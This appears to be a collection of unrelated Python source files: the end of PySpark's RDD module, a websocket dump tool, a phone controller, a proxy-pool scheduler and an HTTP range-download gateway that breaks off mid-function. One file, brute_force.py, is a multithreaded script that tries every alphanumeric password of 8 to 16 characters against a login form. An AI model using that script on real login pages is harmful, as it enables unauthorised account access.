self.coalesce(numPartitions, shuffle=True) def coalesce(self, numPartitions, shuffle=False): """ Return a new RDD that is reduced into `numPartitions` partitions. >>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect() [[1], [2, 3], [4, 5]] >>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect() [[1, 2, 3, 4, 5]] """ if shuffle: # Decrease the batch size in order to distribute evenly the elements across output # partitions. Otherwise, repartition will possibly produce highly skewed partitions. batchSize = min(10, self.ctx._batchSize or 1024) ser = BatchedSerializer(PickleSerializer(), batchSize) selfCopy = self._reserialize(ser) jrdd_deserializer = selfCopy._jrdd_deserializer jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle) else: jrdd_deserializer = self._jrdd_deserializer jrdd = self._jrdd.coalesce(numPartitions, shuffle) return RDD(jrdd, self.ctx, jrdd_deserializer) def zip(self, other): """ Zips this RDD with another one, returning key-value pairs with the first element in each RDD second element in each RDD, etc. Assumes that the two RDDs have the same number of partitions and the same number of elements in each partition (e.g. one was made through a map on the other). >>> x = sc.parallelize(range(0,5)) >>> y = sc.parallelize(range(1000, 1005)) >>> x.zip(y).collect() [(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)] """ def get_batch_size(ser): if isinstance(ser, BatchedSerializer): return ser.batchSize return 1 # not batched def batch_as(rdd, batchSize): return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize)) my_batch = get_batch_size(self._jrdd_deserializer) other_batch = get_batch_size(other._jrdd_deserializer) if my_batch != other_batch or not my_batch: # use the smallest batchSize for both of them batchSize = min(my_batch, other_batch) if batchSize <= 0: # auto batched or unlimited batchSize = 100 other = batch_as(other, batchSize) self = batch_as(self, batchSize) if self.getNumPartitions() != other.getNumPartitions(): raise ValueError("Can only zip with RDD which has the same number of partitions") # There will be an Exception in JVM if there are different number # of items in each partitions. pairRDD = self._jrdd.zip(other._jrdd) deserializer = PairDeserializer(self._jrdd_deserializer, other._jrdd_deserializer) return RDD(pairRDD, self.ctx, deserializer) def zipWithIndex(self): """ Zips this RDD with its element indices. The ordering is first based on the partition index and then the ordering of items within each partition. So the first item in the first partition gets index 0, and the last item in the last partition receives the largest index. This method needs to trigger a spark job when this RDD contains more than one partitions. >>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect() [('a', 0), ('b', 1), ('c', 2), ('d', 3)] """ starts = [0] if self.getNumPartitions() > 1: nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect() for i in range(len(nums) - 1): starts.append(starts[-1] + nums[i]) def func(k, it): for i, v in enumerate(it, starts[k]): yield v, i return self.mapPartitionsWithIndex(func) def zipWithUniqueId(self): """ Zips this RDD with generated unique Long ids. Items in the kth partition will get ids k, n+k, 2*n+k, ..., where n is the number of partitions. So there may exist gaps, but this method won't trigger a spark job, which is different from L{zipWithIndex} >>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect() [('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)] """ n = self.getNumPartitions() def func(k, it): for i, v in enumerate(it): yield v, i * n + k return self.mapPartitionsWithIndex(func) def name(self): """ Return the name of this RDD. """ n = self._jrdd.name() if n: return n @ignore_unicode_prefix def setName(self, name): """ Assign a name to this RDD. >>> rdd1 = sc.parallelize([1, 2]) >>> rdd1.setName('RDD1').name() u'RDD1' """ self._jrdd.setName(name) return self def toDebugString(self): """ A description of this RDD and its recursive dependencies for debugging. """ debug_string = self._jrdd.toDebugString() if debug_string: return debug_string.encode('utf-8') def getStorageLevel(self): """ Get the RDD's current storage level. >>> rdd1 = sc.parallelize([1,2]) >>> rdd1.getStorageLevel() StorageLevel(False, False, False, False, 1) >>> print(rdd1.getStorageLevel()) Serialized 1x Replicated """ java_storage_level = self._jrdd.getStorageLevel() storage_level = StorageLevel(java_storage_level.useDisk(), java_storage_level.useMemory(), java_storage_level.useOffHeap(), java_storage_level.deserialized(), java_storage_level.replication()) return storage_level def _defaultReducePartitions(self): """ Returns the default number of partitions to use during reduce tasks (e.g., groupBy). If spark.default.parallelism is set, then we'll use the value from SparkContext defaultParallelism, otherwise we'll use the number of partitions in this RDD. This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will be inherent. """ if self.ctx._conf.contains("spark.default.parallelism"): return self.ctx.defaultParallelism else: return self.getNumPartitions() def lookup(self, key): """ Return the list of values in the RDD for key `key`. This operation is done efficiently if the RDD has a known partitioner by only searching the partition that the key maps to. >>> l = range(1000) >>> rdd = sc.parallelize(zip(l, l), 10) >>> rdd.lookup(42) # slow [42] >>> sorted = rdd.sortByKey() >>> sorted.lookup(42) # fast [42] >>> sorted.lookup(1024) [] >>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey() >>> list(rdd2.lookup(('a', 'b'))[0]) ['c'] """ values = self.filter(lambda kv: kv[0] == key).values() if self.partitioner is not None: return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)]) return values.collect() def _to_java_object_rdd(self): """ Return a JavaRDD of Object by unpickling It will convert each Python object into Java object by Pyrolite, whenever the RDD is serialized in batch or not. """ rdd = self._pickled() return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True) def countApprox(self, timeout, confidence=0.95): """ .. note:: Experimental Approximate version of count() that returns a potentially incomplete result within a timeout, even if not all tasks have finished. >>> rdd = sc.parallelize(range(1000), 10) >>> rdd.countApprox(1000, 1.0) 1000 """ drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))]) return int(drdd.sumApprox(timeout, confidence)) def sumApprox(self, timeout, confidence=0.95): """ .. note:: Experimental Approximate operation to return the sum within a timeout or meet the confidence. >>> rdd = sc.parallelize(range(1000), 10) >>> r = sum(range(1000)) >>> abs(rdd.sumApprox(1000) - r) / r < 0.05 True """ jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd() jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd()) r = jdrdd.sumApprox(timeout, confidence).getFinalValue() return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high()) def meanApprox(self, timeout, confidence=0.95): """ .. note:: Experimental Approximate operation to return the mean within a timeout or meet the confidence. >>> rdd = sc.parallelize(range(1000), 10) >>> r = sum(range(1000)) / 1000.0 >>> abs(rdd.meanApprox(1000) - r) / r < 0.05 True """ jrdd = self.map(float)._to_java_object_rdd() jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd()) r = jdrdd.meanApprox(timeout, confidence).getFinalValue() return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high()) def countApproxDistinct(self, relativeSD=0.05): """ .. note:: Experimental Return approximate number of distinct elements in the RDD. The algorithm used is based on streamlib's implementation of `"HyperLogLog in Practice: Algorithmic Engineering of a State of The Art Cardinality Estimation Algorithm", available here <http://dx.doi.org/10.1145/2452376.2452456>`_. :param relativeSD: Relative accuracy. Smaller values create counters that require more space. It must be greater than 0.000017. >>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct() >>> 900 < n < 1100 True >>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct() >>> 16 < n < 24 True """ if relativeSD < 0.000017: raise ValueError("relativeSD should be greater than 0.000017") # the hash space in Java is 2^32 hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF) return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD) def toLocalIterator(self): """ Return an iterator that contains all of the elements in this RDD. The iterator will consume as much memory as the largest partition in this RDD. >>> rdd = sc.parallelize(range(10)) >>> [x for x in rdd.toLocalIterator()] [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] """ with SCCallSiteSync(self.context) as css: port = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd()) return _load_from_socket(port, self._jrdd_deserializer) def _prepare_for_python_RDD(sc, command): # the serialized command will be compressed by broadcast ser = CloudPickleSerializer() pickled_command = ser.dumps(command) if len(pickled_command) > (1 << 20): # 1M # The broadcast will have same life cycle as created PythonRDD broadcast = sc.broadcast(pickled_command) pickled_command = ser.dumps(broadcast) broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars] sc._pickled_broadcast_vars.clear() return pickled_command, broadcast_vars, sc.environment, sc._python_includes def _wrap_function(sc, func, deserializer, serializer, profiler=None): assert deserializer, "deserializer should not be empty" assert serializer, "serializer should not be empty" command = (func, profiler, deserializer, serializer) pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command) return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec, sc.pythonVer, broadcast_vars, sc._javaAccumulator) class PipelinedRDD(RDD): """ Pipelined maps: >>> rdd = sc.parallelize([1, 2, 3, 4]) >>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect() [4, 8, 12, 16] >>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect() [4, 8, 12, 16] Pipelined reduces: >>> from operator import add >>> rdd.map(lambda x: 2 * x).reduce(add) 20 >>> rdd.flatMap(lambda x: [x, x]).reduce(add) 20 """ def __init__(self, prev, func, preservesPartitioning=False): if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable(): # This transformation is the first in its stage: self.func = func self.preservesPartitioning = preservesPartitioning self._prev_jrdd = prev._jrdd self._prev_jrdd_deserializer = prev._jrdd_deserializer else: prev_func = prev.func def pipeline_func(split, iterator): return func(split, prev_func(split, iterator)) self.func = pipeline_func self.preservesPartitioning = \ prev.preservesPartitioning and preservesPartitioning self._prev_jrdd = prev._prev_jrdd # maintain the pipeline self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer self.is_cached = False self.is_checkpointed = False self.ctx = prev.ctx self.prev = prev self._jrdd_val = None self._id = None self._jrdd_deserializer = self.ctx.serializer self._bypass_serializer = False self.partitioner = prev.partitioner if self.preservesPartitioning else None def getNumPartitions(self): return self._prev_jrdd.partitions().size() @property def _jrdd(self): if self._jrdd_val: return self._jrdd_val if self._bypass_serializer: self._jrdd_deserializer = NoOpSerializer() if self.ctx.profiler_collector: profiler = self.ctx.profiler_collector.new_profiler(self.ctx) else: profiler = None wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer, self._jrdd_deserializer, profiler) python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func, self.preservesPartitioning) self._jrdd_val = python_rdd.asJavaRDD() if profiler: self._id = self._jrdd_val.id() self.ctx.profiler_collector.add_profiler(self._id, profiler) return self._jrdd_val def id(self): if self._id is None: self._id = self._jrdd.id() return self._id def _is_pipelinable(self): return not (self.is_cached or self.is_checkpointed) def _test(): import doctest from pyspark.context import SparkContext globs = globals().copy() # The small batch size here ensures that we see multiple batches, # even in these small test examples: globs['sc'] = SparkContext('local[4]', 'PythonTest') (failure_count, test_count) = doctest.testmod( globs=globs, optionflags=doctest.ELLIPSIS) globs['sc'].stop() if failure_count: exit(-1) if __name__ == "__main__": _test()
wsdump.py
#!/Users/jenfang/deepWordBug/Adversarial-Playground-Text-viz/virt/bin/python3 import argparse import code import sys import threading import time import ssl import six from six.moves.urllib.parse import urlparse import websocket try: import readline except ImportError: pass def get_encoding(): encoding = getattr(sys.stdin, "encoding", "") if not encoding: return "utf-8" else: return encoding.lower() OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY) ENCODING = get_encoding() class VAction(argparse.Action): def __call__(self, parser, args, values, option_string=None): if values is None: values = "1" try: values = int(values) except ValueError: values = values.count("v") + 1 setattr(args, self.dest, values) def parse_args(): parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool") parser.add_argument("url", metavar="ws_url", help="websocket url. ex. ws://echo.websocket.org/") parser.add_argument("-p", "--proxy", help="proxy url. ex. http://127.0.0.1:8080") parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction, dest="verbose", help="set verbose mode. If set to 1, show opcode. " "If set to 2, enable to trace websocket module") parser.add_argument("-n", "--nocert", action='store_true', help="Ignore invalid SSL cert") parser.add_argument("-r", "--raw", action="store_true", help="raw output") parser.add_argument("-s", "--subprotocols", nargs='*', help="Set subprotocols") parser.add_argument("-o", "--origin", help="Set origin") parser.add_argument("--eof-wait", default=0, type=int, help="wait time(second) after 'EOF' received.") parser.add_argument("-t", "--text", help="Send initial text") parser.add_argument("--timings", action="store_true", help="Print timings in seconds") parser.add_argument("--headers", help="Set custom headers. Use ',' as separator") return parser.parse_args() class RawInput: def raw_input(self, prompt): if six.PY3: line = input(prompt) else: line = raw_input(prompt) if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type): line = line.decode(ENCODING).encode("utf-8") elif isinstance(line, six.text_type): line = line.encode("utf-8") return line class InteractiveConsole(RawInput, code.InteractiveConsole): def write(self, data): sys.stdout.write("\033[2K\033[E") # sys.stdout.write("\n") sys.stdout.write("\033[34m< " + data + "\033[39m") sys.stdout.write("\n> ") sys.stdout.flush() def read(self): return self.raw_input("> ") class NonInteractive(RawInput): def write(self, data): sys.stdout.write(data) sys.stdout.write("\n") sys.stdout.flush() def read(self): return self.raw_input("") def main(): start_time = time.time() args = parse_args() if args.verbose > 1: websocket.enableTrace(True) options = {} if args.proxy: p = urlparse(args.proxy) options["http_proxy_host"] = p.hostname options["http_proxy_port"] = p.port if args.origin: options["origin"] = args.origin if args.subprotocols: options["subprotocols"] = args.subprotocols opts = {} if args.nocert: opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False} if args.headers: options['header'] = map(str.strip, args.headers.split(',')) ws = websocket.create_connection(args.url, sslopt=opts, **options) if args.raw: console = NonInteractive() else: console = InteractiveConsole() print("Press Ctrl+C to quit") def recv(): try: frame = ws.recv_frame() except websocket.WebSocketException: return websocket.ABNF.OPCODE_CLOSE, None if not frame: raise websocket.WebSocketException("Not a valid frame %s" % frame) elif frame.opcode in OPCODE_DATA: return frame.opcode, frame.data elif frame.opcode == websocket.ABNF.OPCODE_CLOSE: ws.send_close() return frame.opcode, None elif frame.opcode == websocket.ABNF.OPCODE_PING: ws.pong(frame.data) return frame.opcode, frame.data return frame.opcode, frame.data def recv_ws(): while True: opcode, data = recv() msg = None if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes): data = str(data, "utf-8") if not args.verbose and opcode in OPCODE_DATA: msg = data elif args.verbose: msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data) if msg is not None: if args.timings: console.write(str(time.time() - start_time) + ": " + msg) else: console.write(msg) if opcode == websocket.ABNF.OPCODE_CLOSE: break thread = threading.Thread(target=recv_ws) thread.daemon = True thread.start() if args.text: ws.send(args.text) while True: try: message = console.read() ws.send(message) except KeyboardInterrupt: return except EOFError: time.sleep(args.eof_wait) return if __name__ == "__main__": try: main() except Exception as e: print(e)
brute_force.py
#!/usr/bin/env python3 from itertools import product from threading import Thread from http.client import responses import requests, sys, os # global var for ending script end = False # thread config pool_limit = 32 threads = [Thread()] * pool_limit # action url of form url = "http://www.example.com/login.php" # set of chars to choose from chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' # range of password lengths pass_min = 8 pass_max = 16 # dict of form fields data = { 'username': 'MyUsername', } def login(attempt): global end password = ''.join(attempt) data['password'] = password print("Trying {}...".format(password)) r = requests.post(url, data=data) if r.status_code != 200: print( "{}: {}: {}".format( os.path.basename(sys.argv[0]), r.status_code, responses[r.status_code], ) ) end = True elif r.url != url: print("Password: {}".format(password)) end = True def main(): i = 0 for length in range(pass_min, pass_max + 1): to_attempt = product(chars, repeat=length) for attempt in to_attempt: if end: return if threads[i].is_alive(): threads[i].join() threads[i] = Thread(target=login, args=(attempt,)) threads[i].start() i = (i + 1) % pool_limit if __name__ == "__main__": main()
gammu_controller.py
import logging import threading from collections import namedtuple from gammu import StateMachine from gammu.worker import GammuWorker from pyphone.controllers.controller import Controller IncomingCallEvent = namedtuple("IncomingCallEvent", ["number"]) EndCallEvent = namedtuple("EndCallEvent", ["number"]) class GammuController(Controller): _log = logging.getLogger(__name__) _system_callbacks = {} _user_callbacks = {} connecting = threading.Event() connected = threading.Event() ongoing_call = threading.Event() def __init__(self, root_panel): super().__init__(root_panel) self._system_callbacks = {"Init": self._on_init_complete, "DialVoice": self._on_dial_voice_complete, "AnswerCall": self._on_answer_call_complete} self._state_machine = StateMachine() self._gammu_worker = GammuWorker(self._on_gammu_result) self._reconnect_thread = threading.Thread(target=self._reconnect_worker, daemon=True) self._reconnect_thread.start() def _reconnect_worker(self): running = True while running: if not self.connecting.isSet(): if not self.connected.isSet(): self.try_connect() else: # necessary for incoming notifications to work correctly self.enqueue_command("ReadDevice") running = not self.stopped.wait(2) def try_connect(self): self.connecting.set() if self._gammu_worker._thread is not None: self._gammu_worker.terminate() self._state_machine.ReadConfig() self._gammu_worker.configure(self._state_machine.GetConfig()) self._log.debug("connecting...") self._gammu_worker.initiate() def cleanup(self): super().cleanup() self._disconnect() def enqueue_command(self, command, params=None, callback=None): self._log.debug("-> [command={}] [params={}]".format(command, params)) if not self.connected.wait(timeout=5): if callback is not None: self._log.error("<- ERR_NOTCONNECTED: ({} {})".format(command, params)) callback(command, None, "ERR_NOTCONNECTED", 100) return if callback is not None: self._user_callbacks[command] = callback self._gammu_worker.enqueue_command(command, params) def bind(self, event, callback): self._user_callbacks[event] = callback def _disconnect(self): try: if self._gammu_worker._thread is not None: self._log.info("disconnecting...") self._gammu_worker.terminate() except: pass self.connected.clear() def _on_gammu_result(self, name, result, error, percents): if self.stopped.isSet(): return if error == "ERR_NONE": error = None self._log.debug("<- {0} ({1:d}%): \"{2}\"".format(name, percents, result if error is None else error)) if name in self._system_callbacks.keys(): self._system_callbacks[name](name, result, error, percents) if name in self._user_callbacks.keys(): self._user_callbacks[name](name, result, error, percents) if (error is not None) and (error.startswith("ERR_DEVICE")): self._disconnect() def _on_init_complete(self, name, result, error, percents): if error is None: self._log.info("connected!") self.connected.set() self.connecting.clear() self._gammu_worker.enqueue_command("SetIncomingCall", (True,)) self._gammu_worker.enqueue_command("SetIncomingCallback", (self._on_incoming_call,)) self._gammu_worker.enqueue_command("SetIncomingSMS", (True,)) self._gammu_worker.enqueue_command("SetIncomingCallback", (self._on_incoming_sms,)) self._gammu_worker.enqueue_command("SetIncomingUSSD", (True,)) self._gammu_worker.enqueue_command("SetIncomingCallback", (self._on_incoming_ussd,)) else: self._log.error("connection failed: {}".format(error)) self.connecting.clear() def _on_dial_voice_complete(self, name, result, error, percents): if (not self.ongoing_call.isSet()) and (error is None): self.ongoing_call.set() def _on_answer_call_complete(self, name, result, error, percents): if (self.ongoing_call.isSet()) and (error is not None): self.ongoing_call.clear() def _on_incoming_call(self, state_machine, event_type, data): self._log.debug("<- [event_type={}] [data={}]".format(event_type, data)) if (data["Status"] == "IncomingCall") and (not self.ongoing_call.isSet()): self.ongoing_call.set() if IncomingCallEvent in self._user_callbacks.keys(): self._user_callbacks[IncomingCallEvent](IncomingCallEvent(data["Number"])) elif ((data["Status"] == "CallEnd") or (data["Status"] == "CallLocalEnd")) and self.ongoing_call.isSet(): self.ongoing_call.clear() if EndCallEvent in self._user_callbacks.keys(): self._user_callbacks[EndCallEvent](EndCallEvent(data["Number"])) def _on_incoming_sms(self, state_machine, event_type, data): self._log.debug("<- [event_type={}] [data={}]".format(event_type, data)) def _on_incoming_ussd(self, state_machine, event_type, data): self._log.debug("<- [event_type={}] [data={}]".format(event_type, data))
scheduler.py
import time from multiprocessing import Process from proxypool.api import app from proxypool.getter import Getter from proxypool.tester import Tester from proxypool.setting import * from .logger_proxy import MyLogger logger = MyLogger.get_logger('scheduler') class Scheduler(object): @staticmethod def schedule_tester(cycle=TESTER_CYCLE): """ 定时测试代理 """ tester = Tester() while True: logger.info('测试器开始运行') tester.run() time.sleep(cycle) @staticmethod def schedule_getter(cycle=GETTER_CYCLE): """ 定时获取代理 """ getter = Getter() while True: logger.info('开始抓取代理') getter.run() time.sleep(cycle) @staticmethod def schedule_api(): """ 开启API """ app.run(API_HOST, API_PORT) def run(self): logger.info('代理池开始运行') if TESTER_ENABLED: tester_process = Process(target=self.schedule_tester) tester_process.start() if GETTER_ENABLED: getter_process = Process(target=self.schedule_getter) getter_process.start() if API_ENABLED: api_process = Process(target=self.schedule_api) api_process.start()
Gateway_v2.py
from http.server import ThreadingHTTPServer, SimpleHTTPRequestHandler from requests_toolbelt.adapters.source import SourceAddressAdapter from datetime import datetime, timezone import config.config as cfg import requests as req import logging as log from socket import * import threading import ssl # init gateway info GATEWAY_IP = cfg.primary['ip'] GATEWAY_PORT = cfg.primary['port'] # init test server info TEST_SERVER_IP = cfg.server['ip'] TEST_SERVER_PORT = str(cfg.server['port']) # init connection info PRIMARY_IP = cfg.primary['ip'] PRIMARY_PORT = cfg.primary['port'] SECOND_IP = cfg.secondary['ip'] SECOND_PORT = cfg.secondary['port'] IS_SECOND_AVAILABLE = True # init request info REQUESTED_HOSTNAME = '' REQUESTED_PATH = '' REQUESTED_PORT = cfg.requested['httpPort'] HTTP_VERSION = cfg.requested['httpVersion'] IS_ACCEPT_RANGE = True IS_VERIFY = False CONTENT_LENGTH = 0 CONTENT_TYPE = "" # init timestamps CURRENT_TIME = datetime.now(timezone.utc).timestamp() START_STAMP_PRIMARY = CURRENT_TIME END_STAMP_PRIMARY = CURRENT_TIME START_STAMP_SECOND = CURRENT_TIME END_STAMP_SECOND = CURRENT_TIME REQUEST_RECV_TIME = CURRENT_TIME REQUEST_HANDLE_TIME = CURRENT_TIME # init range boundaries PRIMARY_RANGE_START = 0 PRIMARY_RANGE_END = 0 SECOND_RANGE_START = 0 SECOND_RANGE_END = 0 SECOND_LOAD = 0 SEGMENT_SIZE = 0 # init get request responses to keep them as bytes RESPONSE_PRIMARY = b"" RESPONSE_SECOND = b"" RESPONSE = b"" # init head request response HEAD_RESPONSE_HEADERS = None # init socket request headers SOCKET_HEAD_HEADERS = "" SOCKET_GET_HEADERS = "" # constants to create headers LINE = "\r\n" HEADER = LINE + LINE # TODO delete TOTAL = 0 def handleRequest(self): assignRequestInfo(self.path[1:]) createSocketHeadHeaders() measureBandwidth() assignContentInfo() log.info("++++ Head requests are done ++++") getRequestedSource(self) # Assign request info # Requested string comes in the format of http://site/path or https://site/path def assignRequestInfo(requested): global HTTP_VERSION, REQUESTED_PORT, REQUESTED_HOSTNAME, REQUESTED_PATH, IS_VERIFY HTTP_VERSION = requested.split(":")[0] + "://" if HTTP_VERSION.__contains__("s"): IS_VERIFY = True REQUESTED_PORT = cfg.requested['httpsPort'] REQUESTED_HOSTNAME = requested.split("//")[1].split("/")[0] if REQUESTED_HOSTNAME.__contains__(":"): REQUESTED_HOSTNAME = REQUESTED_HOSTNAME.split(":")[0] REQUESTED_PORT = 8080 REQUESTED_PATH = '/' try: REQUESTED_PATH += requested.split("//")[1].split("/", 1)[1] except: log.error("No path was found") # Create headers to send HEAD request over socket using Secondary Connection def createSocketHeadHeaders(): global SOCKET_HEAD_HEADERS SOCKET_HEAD_HEADERS = "HEAD " + REQUESTED_PATH + " HTTP/1.1" + LINE SOCKET_HEAD_HEADERS += "Host: " + REQUESTED_HOSTNAME + LINE SOCKET_HEAD_HEADERS += "Accept: */*" + LINE SOCKET_HEAD_HEADERS += "User-Agent: kibitzer" + LINE SOCKET_HEAD_HEADERS += "Connection: Close" + HEADER # Measure bandwidth using HEAD requests over two connections def measureBandwidth(): defaultThread = threading.Thread(target=sendHeadPrimary) mobileThread = threading.Thread(target=sendHeadSecondary) defaultThread.start() mobileThread.start() defaultThread.join() mobileThread.join() # Send HEAD request over Primary Connection def sendHeadPrimary(): log.info("*** Primary head is started") global START_STAMP_PRIMARY, HEAD_RESPONSE_HEADERS, END_STAMP_PRIMARY START_STAMP_PRIMARY = getCurrentTime() if REQUESTED_PORT == 8080: URL = HTTP_VERSION + REQUESTED_HOSTNAME + ":8080" + REQUESTED_PATH else: URL = HTTP_VERSION + REQUESTED_HOSTNAME + REQUESTED_PATH HEAD_RESPONSE_HEADERS = req.head(URL, verify=IS_VERIFY) END_STAMP_PRIMARY = getCurrentTime() HEAD_RESPONSE_HEADERS = HEAD_RESPONSE_HEADERS.headers log.info("*** Primary head is done") # Send HEAD request over Secondary Connection def sendHeadSecondary(): log.info("--- Secondary head is started") global IS_SECOND_AVAILABLE try: con = socket(AF_INET, SOCK_STREAM) con.bind((SECOND_IP, SECOND_PORT)) if IS_VERIFY: sendHeadSecondaryHttps(con) else: sendHeadSecondaryHttp(con) log.info("--- Secondary head is done") except: log.info("--- Second connection was not found") IS_SECOND_AVAILABLE = False # Send HEAD request to HTTPS sources def sendHeadSecondaryHttps(con): global START_STAMP_SECOND, END_STAMP_SECOND context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) context.verify_mode = ssl.CERT_REQUIRED context.check_hostname = True context.load_default_certs() ssl_socket = context.wrap_socket(con, server_hostname=REQUESTED_HOSTNAME) ssl_socket.connect((REQUESTED_HOSTNAME, REQUESTED_PORT)) START_STAMP_SECOND = getCurrentTime() ssl_socket.sendall(SOCKET_HEAD_HEADERS.encode("utf-8")) ssl_socket.recv(10) END_STAMP_SECOND = getCurrentTime() ssl_socket.close() con.close() # Send HEAD request to HTTP def sendHeadSecondaryHttp(con): global START_STAMP_SECOND, END_STAMP_SECOND con.connect((REQUESTED_HOSTNAME, REQUESTED_PORT)) START_STAMP_SECOND = getCurrentTime() con.sendall(SOCKET_HEAD_HEADERS.encode('utf-8')) con.recv(10) END_STAMP_SECOND = getCurrentTime() con.close() # Check HEAD request responses and assign content info def assignContentInfo(): global IS_ACCEPT_RANGE, CONTENT_LENGTH, CONTENT_TYPE try: if HEAD_RESPONSE_HEADERS["accept-ranges"].lower() == "none": IS_ACCEPT_RANGE = False except: log.error("Accept-Range header was not found") IS_ACCEPT_RANGE = False try: CONTENT_LENGTH = int(HEAD_RESPONSE_HEADERS["content-length"]) except: log.error("Content-Length header was not found") try: CONTENT_TYPE = HEAD_RESPONSE_HEADERS["content-type"] except: log.error("Content-Type header was not found") def getRequestedSource(self): global PRIMARY_RANGE_START, PRIMARY_RANGE_END, SECOND_RANGE_START, SECOND_RANGE_END, SECOND_LOAD, SEGMENT_SIZE, RESPONSE, RESPONSE_PRIMARY SEGMENT_SIZE = int(CONTENT_LENGTH / 10) segments = list(range(0, CONTENT_LENGTH + 1, SEGMENT_SIZE)) # print(segments) # print(SEGMENT_SIZE) # print(SEGMENT_SIZE * 10) # print(CONTENT_LENGTH) defaultLW, secondaryLW = getLoadWeights() headers = { "Host": REQUESTED_HOSTNAME, "Accept": "*/*", "User-Agent": "kibitzer", 'Connection': 'Close' } if REQUESTED_PORT == 8080: URL = HTTP_VERSION + REQUESTED_HOSTNAME + ":8080" + REQUESTED_PATH else: URL = HTTP_VERSION + REQUESTED_HOSTNAME + REQUESTED_PATH for i in range(0, 10): # print("-------" + str(i)) PRIMARY_RANGE_START = segments[i] PRIMARY_RANGE_END = segments[i] + round(defaultLW * SEGMENT_SIZE) - 1 # print("pr start: " + str(PRIMARY_RANGE_START)) # print("pr end: " + str(PRIMARY_RANGE_END)) SECOND_RANGE_START = PRIMARY_RANGE_END + 1 SECOND_RANGE_END = segments[i + 1] - 1 SECOND_LOAD = SECOND_RANGE_END - SECOND_RANGE_START # print("sc start: " + str(SECOND_RANGE_START)) # print("sc end: " + str(SECOND_RANGE_END)) log.info("*** Primary load length: %s bytes / %s MB", str(PRIMARY_RANGE_END - PRIMARY_RANGE_START), str(round(convertToMb(PRIMARY_RANGE_END - PRIMARY_RANGE_START), 2))) log.info("--- Secondary load length: %s bytes / %s MB", str(SECOND_RANGE_END - SECOND_RANGE_START), str(round(convertToMb(SECOND_RANGE_END - SECOND_RANGE_START), 2))) if IS_ACCEPT_RANGE: rangeValue = 'bytes=' + str(PRIMARY_RANGE_START) + '-' + str(PRIMARY_RANGE_END) headers.update({'Range': rangeValue}) print("rangeValue") print(rangeValue) RESPONSE_PRIMARY = req.get(URL, headers=headers, verify=True) RESPONSE = RESPONSE_PRIMARY.content print(RESPONSE_PRIMARY.headers['Content-Range']) print(RESPONSE_PRIMARY.headers['Content-Length']) # print(RESPONSE_PRIMARY.status_code) print("bytes " + str(PRIMARY_RANGE_START) + "-" + str(PRIMARY_RANGE_END) + "/" + str(CONTENT_LENGTH)) print(SEGMENT_SIZE) # sendRangeRequest() # pushBackToClient(self) global REQUEST_HANDLE_TIME self.send_response(206) self.send_header('Accept-Ranges', "bytes") self.send_header('Content-Type', CONTENT_TYPE) self.send_header('Access-Control-Allow-Origin', '*') self.send_header('Content-Range', "bytes " + str(PRIMARY_RANGE_START) + "-" + str(PRIMARY_RANGE_END) + "/" + str(CONTENT_LENGTH)) self.send_header('Content-Length', str(SEGMENT_SIZE)) self.end_headers() self.wfile.write(RESPONSE) # self.wfile.write(bytearray("asdasd", 'utf-8')) log.info("Response is pushed back to client") REQUEST_HANDLE_TIME = getCurrentTime() log.info("Total time passed: %s seconds", str(round(REQUEST_HANDLE_TIME - REQUEST_RECV_TIME, 2))) RESPONSE_PRIMARY = b"" RESPONSE = b"" print("-------------------------------------------------------------------------------------------") # Calculate load weights def getLoadWeights(): primaryStamp = END_STAMP_PRIMARY - START_STAMP_PRIMARY secondaryStamp = END_STAMP_SECOND - START_STAMP_SECOND log.info("*** Primary stamp: %s", str(round(primaryStamp, 2))) log.info("--- Secondary stamp: %s", str(round(secondaryStamp, 2))) log.info("Content-Length: %s", str(CONTENT_LENGTH)) if secondaryStamp != 0: defaultLoadRate = round((secondaryStamp / (primaryStamp + secondaryStamp)), 2) else: defaultLoadRate = 1 return 